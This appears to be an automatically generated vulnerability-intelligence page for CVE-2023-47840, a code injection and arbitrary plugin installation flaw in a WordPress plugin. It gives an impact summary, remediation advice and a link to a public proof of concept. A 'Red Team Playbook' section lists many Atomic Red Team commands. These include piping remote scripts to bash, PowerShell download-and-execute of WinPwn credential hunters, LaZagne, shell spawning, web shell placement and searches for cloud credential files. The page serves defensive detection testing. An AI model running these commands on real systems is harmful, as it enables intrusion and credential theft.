CVE-2023-47840
Overview
This vulnerability is a code injection flaw arising from improper control over code generation within the Qode Essential Addons plugin for WordPress. The root cause lies in insufficient validation or sanitization of user-supplied input that is processed and executed as code. The affected component is the Qode Essential Addons plugin versions up to and including 1.5.2, which handles dynamic code generation based on user input.
Vulnerability Description
Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons.This issue affects Qode Essential Addons: from n/a through 1.5.2.
Impact
An attacker with a low-privileged account on a WordPress site using the vulnerable Qode Essential Addons plugin can execute arbitrary code on the server without user interaction. This enables full compromise of the hosting environment, including data theft, modification, and potential lateral movement within the network. The vulnerability can lead to complete system takeover, affecting confidentiality, integrity, and availability of the affected site and its data.
Solution
Upgrade the Qode Essential Addons plugin to a version later than 1.5.2 where this vulnerability is addressed. Refer to the Patchstack advisory at https://patchstack.com/database/vulnerability/qode-essential-addons/wordpress-qode-essential-addons-plugin-1-5-2-arbitrary-plugin-installation-and-activation-vulnerability?_s_id=cve for detailed patch instructions and recommended mitigation steps. Applying the vendor-provided update is essential to remediate the improper code injection flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with improper control of code generation, specifically within the Qode Essential Addons for WordPress, presents a significant risk due to its potential for code injection. This flaw allows an attacker to execute arbitrary code on the server by manipulating input parameters that are not adequately validated or sanitized. The affected versions of the Qode Essential Addons, up to and including 1.5.2, lack sufficient safeguards against such attacks, making them susceptible to exploitation. Code injection vulnerabilities are particularly dangerous as they can lead to unauthorized access, data breaches, and the complete compromise of the affected web application.
Attack vectors for this vulnerability are varied and can be executed through multiple means. An attacker could leverage forms, URL parameters, or any other input fields that interact with the backend of the WordPress site using the Qode Essential Addons. By injecting malicious code, an attacker can manipulate the execution flow of the application, potentially leading to the execution of harmful scripts that could alter the website's content, steal sensitive information, or even deploy malware. Exploitation scenarios could range from simple defacement of a website to more complex attacks involving the installation of backdoors for persistent access.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on the Qode Essential Addons for their WordPress sites. A successful exploitation could lead to significant business risks, including loss of customer trust, reputational damage, and financial losses due to downtime or recovery efforts. Organizations may also face regulatory repercussions if sensitive customer data is compromised, leading to potential fines and legal liabilities. The high CVSS score of 8.8 indicates that this vulnerability should be treated with urgency, as it poses a critical threat to the integrity and security of affected systems.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Qode Essential Addons to the latest version is essential, as updates often include security patches that address known vulnerabilities. Additionally, employing web application firewalls (WAF) can help filter out malicious traffic and prevent exploitation attempts. Conducting regular security audits and penetration testing can also assist in identifying vulnerabilities before they can be exploited by malicious actors. Furthermore, implementing strict input validation and sanitization measures within the application can significantly reduce the risk of code injection attacks.
In conclusion, the improper control of code generation vulnerability in the Qode Essential Addons for WordPress represents a serious threat to web applications utilizing this plugin. The potential for exploitation through code injection can lead to severe consequences for businesses, making it imperative for organizations to prioritize security measures. By staying informed about vulnerabilities, applying timely updates, and adopting robust security practices, businesses can better protect themselves against the risks associated with this and similar vulnerabilities.
The CVSS score for CVE-2023-47840 has been revised upward from 8.8 to 9.9, reflecting a reassessment of the vulnerability’s criticality based on emerging exploit evidence and impact potential. This change underscores the heightened risk posed by the improper control of code generation in Qode Essential Addons, particularly given the availability of a public proof-of-concept exploit that enables arbitrary plugin installation and activation without proper authorization. CSURFACE threat intelligence has noted that while the EPSS score remains stable, the exploitability percentile is high, indicating that threat actors are well-positioned to leverage this vulnerability effectively. This escalation in severity signals that defenders must regard CVE-2023-47840 as an immediate and critical threat, as successful exploitation could lead to full compromise of affected WordPress environments. The increased CVSS score also suggests that the window for safe remediation is narrowing, and that the vulnerability’s impact on confidentiality, integrity, and availability is more severe than previously assessed.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qodeinteractive | Qode Essential Addons | All |
cpe:2.3:a:qodeinteractive:qode_essential_addons:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2023-47840
Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Acti...
|
RandomRobbieBF | 3 | 0 | 2023-11-29 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-47840 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/qode-essential-addons/wordpress-qode-essential-addons-plugin-1-5-2-arbitrary-plugin-installation-and-activation-vulnerability?_s_id=cve |